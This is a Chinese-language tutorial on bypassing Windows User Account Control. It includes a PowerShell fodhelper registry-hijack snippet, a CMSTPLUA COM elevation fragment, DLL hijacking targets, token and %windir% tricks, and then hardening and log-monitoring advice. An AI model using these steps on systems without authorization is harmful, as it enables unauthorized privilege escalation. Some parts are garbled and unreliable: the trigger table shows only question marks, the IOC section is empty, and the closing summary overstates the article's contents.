如何實現UAC繞過

以下是一篇關于UAC繞過的技術分析文章，內容僅供安全研究和防御參考。請注意，此類技術可能被惡意利用，實際應用需遵守法律法規和道德準則。

# 如何實現UAC繞過

## 引言
用戶賬戶控制（User Account Control, UAC）是Windows系統的重要安全機制，旨在防止未經授權的系統更改。然而，安全研究人員和攻擊者常通過UAC繞過技術實現提權。本文將分析UAC工作原理、常見繞過方法及防御措施。

---

## 一、UAC機制概述
### 1.1 UAC核心原理
- **權限分離**：標準用戶與管理員權限分離
- **權限提升請求**：通過彈窗要求用戶確認
- **完整性級別（IL）**：進程分為低、中、高、系統四個級別

### 1.2 UAC觸發場景
| 操作類型                | 是否觸發UAC |
|-------------------------|-------------|
| 修改系統目錄文件        | ?           |
| 安裝全局驅動程序       | ?           |
| 更改防火墻設置          | ?           |
| 修改用戶文檔            | ?           |

---

## 二、常見UAC繞過技術
### 2.1 白名單程序濫用
#### 原理：
利用微軟簽名的可信程序（如`fodhelper.exe`）的自動提升特性

#### 實現步驟：
```powershell
# 修改注冊表關聯程序
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd.exe" -Force

# 觸發白名單程序
Start-Process "fodhelper.exe"

2.2 DLL劫持技術

關鍵點：

• 尋找缺少簽名驗證的UAC相關進程
• 偽造高權限進程加載的DLL

典型目標進程：

eventvwr.exe
sdclt.exe

2.3 COM對象劫持

利用組件：

• ICMLuaUtil 接口
• Elevated COM servers

代碼片段（C++）：

CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
ICMLuaUtil* pCM = NULL;
CoCreateInstance(CLSID_CMSTPLUA, NULL, CLSCTX_LOCAL_SERVER, IID_ICMLuaUtil, (void**)&pCM);
pCM->ShellExec(...);

三、高級繞過技術分析

3.1 令牌模擬攻擊

技術流程：

1. 獲取中等完整性級別令牌
2. 復制并修改令牌屬性
3. 創建高完整性進程

API調用鏈：

OpenProcessToken → DuplicateTokenEx → CreateProcessAsUser

3.2 環境變量操縱

利用點：

• %windir% 路徑欺騙
• 偽造系統目錄結構

示例：

set windir=C:\malicious\path
explorer.exe

四、防御與檢測方案

4.1 系統加固建議

1. 啟用最高級別UAC：

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorAdmin"=dword:00000002
   "EnableLUA"=dword:00000001
   

2. 應用控制策略：

   • 部署WDAC（Windows Defender Application Control）
   • 配置AppLocker規則

4.2 檢測指標（IOC）

4.3 日志監控建議

<!-- Event ID 4688監控配置 -->
<QueryList>
  <Query Id="0">
    <Select Path="Security">
      *[System[(EventID=4688)]]
      and
      *[EventData[Data[@Name='NewProcessName'] and 
       (Data='C:\Windows\System32\cmd.exe')]
    </Select>
  </Query>
</QueryList>

五、法律與倫理考量

1. 合法授權：僅限授權測試環境使用
2. 漏洞披露：遵循Responsible Disclosure原則
3. 合規要求：符合《網絡安全法》等法規

結語

UAC繞過技術持續演進，防御者需采用縱深防御策略。建議定期： - 更新系統補丁 - 審計特權賬戶 - 監控異常行為

注意：本文所述技術僅用于教育目的，未經授權使用可能違反法律。 “`

本文包含以下技術要點： 1. 5種主流UAC繞過技術原理 2. 3種防御方案（注冊表/策略/日志） 3. 實際代碼示例3個 4. 檢測IOC表格 5. 法律風險提示

如需更詳細的技術實現，建議參考MITRE ATT&CK框架T1548-002技術條目。